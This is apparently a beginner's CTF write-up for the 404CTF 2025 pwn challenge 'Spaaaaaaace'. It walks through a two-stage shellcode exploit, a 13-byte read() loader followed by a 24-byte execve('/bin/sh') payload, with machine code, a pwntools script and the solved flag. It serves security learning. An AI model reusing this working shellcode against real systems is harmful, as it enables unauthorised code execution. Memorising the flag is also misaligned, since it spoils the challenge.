Spaaaaaaace - 404CTF 2025

TL;DR

RWX memory + 13-byte size limit = staged shellcode time! Upload a tiny loader (13 bytes), run it so it reads a bigger shellcode (24 bytes) in right behind itself, and let execution fall through into it to get a shell 🚀

Challenge Files: chall (ELF binary)

Note: This is one of my first CTF writeups! At the time I solved this challenge, I was just starting out with pwn. There are probably cleaner/simpler ways to solve this, but this approach worked for me. If you spot improvements, feel free to share! 🙂

Challenge Overview

We’re given a “Firmware Updater v1.0” for a “space core”.

The program has 3 options:

1. Upload an update      <- Our entry point
2. Run the firmware      <- Executes our code
3. Open a bidirectional connection  <- Just exits

Binary Protections

Let’s check what we’re dealing with:

$ checksec chall
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

What this means:

✅ NX enabled - Stack isn’t executable (doesn’t matter, we have RWX mmap!)
✅ PIE enabled - Addresses are randomized (also doesn’t matter for us)
❌ No canary - Stack overflow protection disabled
⚠️ Partial RELRO - GOT is writable

But here’s the thing: none of this matters because the program literally gives us RWX memory and executes whatever we send! The protections are meaningless when there’s a deliberate code execution feature. 😎

Source Code Analysis

Let’s look at the juicy parts:

long firmware_max_size = 0xd; // Only 13 bytes!
void *firmware;

// Allocate RWX memory - the good stuff
firmware = mmap(NULL, 0x1000, 
                PROT_READ | PROT_WRITE | PROT_EXEC, 
                MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

The program allocates 4KB (0x1000 bytes) with RWX permissions - read, write, AND execute. That’s shellcode heaven! But there’s a catch…

void upload_update(long firmware_max_size, void* firmware) {
   printf("Ready to receive update > ");
   bytes_read = read(0, firmware, firmware_max_size);
}

void apply_update(void* firmware) {
   ((void (*)())firmware)();  // Cast and execute!
}

The problem: We can only upload 13 bytes (0xd), but an execve("/bin/sh") shellcode typically needs 20-30 bytes (the one used below is 24). Houston, we have a problem! 🚨

The Solution: Staged Shellcode

Since we can’t fit everything in 13 bytes, we’ll use a two-stage approach:

Stage 1 (13 bytes): A tiny loader that reads more data
Stage 2 (24 bytes): The actual execve shellcode

Think of it like a rocket: Stage 1 gets us into orbit, Stage 2 takes us to the moon! 🌙
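To make the size budget concrete, here is a minimal sketch in plain Python (no pwntools needed). The byte strings are the two stages from this writeup; the helper name check_budget is made up for illustration:

```python
FIRMWARE_MAX_SIZE = 0xD   # upload limit from the challenge source
MAPPING_SIZE = 0x1000     # size of the RWX mmap region

# The two stages used in this writeup, as hex.
stage1 = bytes.fromhex("488d770d31ff31c06a185a0f05")
stage2 = bytes.fromhex("4831f65648bf2f2f62696e2f736857545f4831d2b03b0f05")

def check_budget(stage1, stage2, max_upload=FIRMWARE_MAX_SIZE, mapping=MAPPING_SIZE):
    """Return (fits_upload, fits_mapping, spare_bytes) for a two-stage payload."""
    fits_upload = len(stage1) <= max_upload
    total = len(stage1) + len(stage2)
    return fits_upload, total <= mapping, mapping - total

print(len(stage1), len(stage2), check_budget(stage1, stage2))
```

Stage 1 uses the upload limit exactly, and both stages together take up only a tiny part of the 4KB mapping.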

Stage 1: The Loader (13 bytes)

This shellcode reads additional bytes from stdin and stores them right after itself:

lea rsi, [rdi+0xd]   ; Calculate where to write (firmware + 13)
xor edi, edi         ; fd = 0 (stdin)
xor eax, eax         ; syscall number 0 (read)
push 0x18            ; Length to read (24 bytes)
pop rdx              ; rdx = 24 (size)
syscall              ; Call read(0, firmware+13, 24)

Machine code: \x48\x8d\x77\x0d\x31\xff\x31\xc0\x6a\x18\x5a\x0f\x05

How it works:

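When apply_update() is called, rdi contains the firmware address (it is the function's first argument). The exploit relies on rdi still holding that address when our code starts running
lea rsi, [rdi+0xd] calculates the address right after our 13-byte shellcode
We set up the registers for a read(0, firmware+13, 24) syscall: rax = 0, rdi = 0, rsi = firmware+13, rdx = 24
Stage 1 ends at offset 13, exactly where Stage 2 gets written, so once the syscall returns, execution falls straight through into Stage 2!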
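The fall-through can be checked by adding up instruction lengths. The sketch below splits Stage 1 into the instructions listed above and confirms that the lea displacement equals the total length of the loader. The layout helper is hypothetical and only sums byte counts, it is not a disassembler:

```python
# Stage 1, split per instruction as listed in the writeup.
STAGE1 = [
    (bytes.fromhex("488d770d"), "lea rsi, [rdi+0xd]"),
    (bytes.fromhex("31ff"),     "xor edi, edi"),
    (bytes.fromhex("31c0"),     "xor eax, eax"),
    (bytes.fromhex("6a18"),     "push 0x18"),
    (bytes.fromhex("5a"),       "pop rdx"),
    (bytes.fromhex("0f05"),     "syscall"),
]

def layout(instructions):
    """Return ([(offset, size, text), ...], end_offset) for a list of encoded instructions."""
    rows, offset = [], 0
    for code, text in instructions:
        rows.append((offset, len(code), text))
        offset += len(code)
    return rows, offset

rows, end_offset = layout(STAGE1)
lea_disp = STAGE1[0][0][3]    # last byte of the lea is its 8-bit displacement
read_len = STAGE1[3][0][1]    # immediate operand of push

for offset, size, text in rows:
    print(f"+{offset:#04x}  {size} bytes  {text}")
print(f"loader ends at +{end_offset:#x}, read() writes to +{lea_disp:#x}, length {read_len}")
```

If the displacement were anything other than the loader's length, the CPU would run into leftover zero bytes or into the middle of Stage 2 after the syscall.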

Stage 2: The Shell (24 bytes)

This is a classic execve("/bin/sh") shellcode:

xor rsi, rsi                      ; rsi = NULL (argv)
push rsi                          ; Push NULL (string terminator)
mov rdi, 0x68732f6e69622f2f       ; Load "//bin/sh" (little-endian)
push rdi                          ; Push "//bin/sh" onto stack
push rsp                          ; Push address of string
pop rdi                           ; rdi = address of "//bin/sh"
xor rdx, rdx                      ; rdx = NULL (envp)
mov al, 0x3b                      ; rax = 59 (execve): read() left rax = 24, so its upper bytes are 0
syscall                           ; Call execve("//bin/sh", NULL, NULL)

Machine code: \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05
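One detail worth spelling out: mov al, 0x3b only writes the low byte of rax, so Stage 2 depends on what Stage 1's read() left in that register. The sketch below models this with plain integers. The helper mov_al is made up for illustration, and -9 is the kernel's return value for a read() that fails with EBADF:

```python
MASK64 = (1 << 64) - 1

def mov_al(rax, imm8):
    """Model `mov al, imm8`: replace the low byte of rax, keep the upper 56 bits."""
    return (rax & ~0xFF & MASK64) | (imm8 & 0xFF)

EXECVE = 0x3B  # syscall 59 on x86-64 Linux

# Normal case: read() returned the 24 bytes of Stage 2, so rax = 24.
rax_ok = mov_al(24, EXECVE)

# Failure case: a failed read() returns a negative errno, e.g. -EBADF = -9.
rax_bad = mov_al(-9 & MASK64, EXECVE)

print(hex(rax_ok), hex(rax_bad))
```

In the normal case rax ends up as 59. If read() had failed, the upper bytes would stay set and the syscall number would be invalid. A push 0x3b / pop rax pair would not depend on the previous value of rax, at the cost of one extra byte.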

Exploitation Flow

Here’s how the magic happens:

┌──────────────┐
│ 1. Upload    │  Send Stage 1 (13 bytes)
│    Update    │  
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ 2. Run       │  Execute Stage 1
│    Firmware  │  
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Stage 1      │  Calls read() to get more data
│ executing... │  Reads 24 more bytes
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Send Stage 2 │  Our execve shellcode
│ (24 bytes)   │  
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Stage 2      │  Spawns /bin/sh
│ executing... │  
└──────┬───────┘
       │
       ▼
    🐚 SHELL!

Memory Layout

Before exploitation:

┌─────────────────────────────────────┐
│ firmware address (0x1000 bytes)      │
│ Permissions: RWX                     │
│ Empty...                             │
└─────────────────────────────────────┘

After uploading Stage 1:

┌─────────────────────────────────────┐
│ Stage 1 (13 bytes)                   │
├─────────────────────────────────────┤
│ Empty...                             │
└─────────────────────────────────────┘

After Stage 1 executes:

┌─────────────────────────────────────┐
│ Stage 1 (13 bytes)                   │
├─────────────────────────────────────┤
│ Stage 2 (24 bytes) ← Just loaded!    │
├─────────────────────────────────────┤
│ Empty...                             │
└─────────────────────────────────────┘
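The three layouts above can be reproduced with a bytearray standing in for the mapping. This is only a model of what the two read() calls write, not an emulation of the binary. The helpers upload and stage1_read are hypothetical names:

```python
stage1 = bytes.fromhex("488d770d31ff31c06a185a0f05")
stage2 = bytes.fromhex("4831f65648bf2f2f62696e2f736857545f4831d2b03b0f05")

# Anonymous mmap memory starts out zero-filled.
firmware = bytearray(0x1000)

def upload(firmware, data, max_size=0xD):
    """Model read(0, firmware, firmware_max_size): at most 13 bytes land at offset 0."""
    chunk = data[:max_size]
    firmware[:len(chunk)] = chunk
    return len(chunk)

def stage1_read(firmware, data, offset=0xD, count=0x18):
    """Model Stage 1's read(0, firmware+13, 24): bytes land right after the loader."""
    chunk = data[:count]
    firmware[offset:offset + len(chunk)] = chunk
    return len(chunk)

upload(firmware, stage1)
stage1_read(firmware, stage2)

print(firmware[:13].hex())     # Stage 1
print(firmware[13:37].hex())   # Stage 2
print(any(firmware[37:]))      # rest of the page is still empty
```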

Exploit Script

from pwn import *

# Connect to target (PORT is a placeholder: set it to the port shown on the challenge page)
io = remote('challenges.404ctf.fr', PORT)
# or for local: io = process('./chall')

# Stage 1: Tiny loader (13 bytes)
stage1 = b"\x48\x8d\x77\x0d"  # lea rsi, [rdi+0xd]
stage1 += b"\x31\xff"          # xor edi, edi
stage1 += b"\x31\xc0"          # xor eax, eax
stage1 += b"\x6a\x18"          # push 0x18
stage1 += b"\x5a"              # pop rdx
stage1 += b"\x0f\x05"          # syscall

log.info(f"Stage 1 size: {len(stage1)} bytes")

# Stage 2: execve("/bin/sh") (24 bytes)
stage2 = b"\x48\x31\xf6"                          # xor rsi, rsi
stage2 += b"\x56"                                  # push rsi
stage2 += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  # mov rdi, "//bin/sh"
stage2 += b"\x57"                                  # push rdi
stage2 += b"\x54"                                  # push rsp
stage2 += b"\x5f"                                  # pop rdi
stage2 += b"\x48\x31\xd2"                          # xor rdx, rdx
stage2 += b"\xb0\x3b"                              # mov al, 0x3b
stage2 += b"\x0f\x05"                              # syscall

log.info(f"Stage 2 size: {len(stage2)} bytes")

# Step 1: Upload Stage 1
io.sendlineafter(b'> ', b'1')
io.sendafter(b'> ', stage1)

# Step 2: Execute firmware (Stage 1 runs and waits for input)
io.sendlineafter(b'> ', b'2')

# Step 3: Stage 1 is now waiting on read() - send Stage 2!
io.send(stage2)

# Get shell!
io.interactive()

Key Technical Points

1. The ModR/M Byte Matters!

A common mistake: using lea rsp, [rdi+0xd] instead of lea rsi, [rdi+0xd]. The two encodings differ only in the ModR/M byte (48 8d 67 0d vs 48 8d 77 0d), so a single wrong hex digit corrupts the stack pointer instead of setting up our destination address. Always double-check your assembly! 🔍
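To see where that byte comes from, here is a small sketch that builds the encoding of lea dst, [base+disp8] by hand. It only covers the eight legacy 64-bit registers and an 8-bit displacement. The function name lea_disp8 is made up for illustration:

```python
# Register numbers used in the ModR/M byte (low 8 registers only).
REG = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3, "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}

def lea_disp8(dst, base, disp):
    """Encode `lea dst, [base+disp]` with an 8-bit displacement (REX.W 8D /r)."""
    if base == "rsp":
        raise ValueError("rsp as base needs a SIB byte, not handled in this sketch")
    if not -128 <= disp <= 127:
        raise ValueError("displacement does not fit in 8 bits")
    # ModR/M = mod (01: disp8 follows) | reg (destination) | rm (base register)
    modrm = (0b01 << 6) | (REG[dst] << 3) | REG[base]
    return bytes([0x48, 0x8D, modrm, disp & 0xFF])

good = lea_disp8("rsi", "rdi", 0xD)
bad = lea_disp8("rsp", "rdi", 0xD)
print(good.hex(), bad.hex())
```

The destination register sits in bits 3-5 of the ModR/M byte: rsi is 110 and rsp is 100, which is the whole difference between 0x77 and 0x67.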

2. Why Staged Shellcode?

This technique is super common in real exploits:

The initial space is often limited (buffer size restrictions)
Tools like Metasploit ship staged payloads for exactly this reason
A small first stage allows complex payloads despite space constraints

3. Direct Syscalls

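We use raw syscalls instead of libc functions for:

Smaller code size - just a few register loads and a 2-byte syscall instruction
Portability - syscall numbers are fixed for x86-64 Linux, whatever libc version the target uses
No dependency on libc addresses, which ASLR randomizes and which we would otherwise have to leak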

4. The “/bin/sh” String

We use //bin/sh (8 bytes) instead of /bin/sh (7 bytes) because it fills a 64-bit register exactly, with no padding byte needed. The extra / doesn’t hurt - Linux path resolution treats consecutive slashes like a single one.
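Here is a short sketch of how the string becomes the immediate in mov rdi, 0x68732f6e69622f2f, and what ends up on the stack after push rsi / push rdi. It uses only the struct module. The stack is modeled as bytes starting at the address rsp points to:

```python
import struct

path = b"//bin/sh"

# x86-64 is little-endian: the first character ends up in the lowest byte.
imm64 = struct.unpack("<Q", path)[0]

# After `push rsi` (NULL) and `push rdi`, the string sits at the lower
# address (where rsp points), followed by 8 zero bytes.
stack = struct.pack("<Q", imm64) + struct.pack("<Q", 0)

# execve reads a C string: everything up to the first NUL byte.
c_string = stack.split(b"\x00", 1)[0]

print(hex(imm64), len(b"/bin/sh"), len(path), c_string)
```

The pushed NULL is what terminates the string, which is why Stage 2 pushes rsi before pushing the path.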

Lessons Learned

Exploitation techniques:

Staged payloads - When space is limited, load a small loader first
RWX memory abuse - If you can write and execute, game over
Register conventions - Understanding calling conventions (rdi = first arg)
Shellcode optimization - Every byte counts when space is tight
Stack manipulation - Building strings on the stack for execve

Flag

404CTF{wh3n_l1fe_91ve5_you_LeMOn...}

Lemon
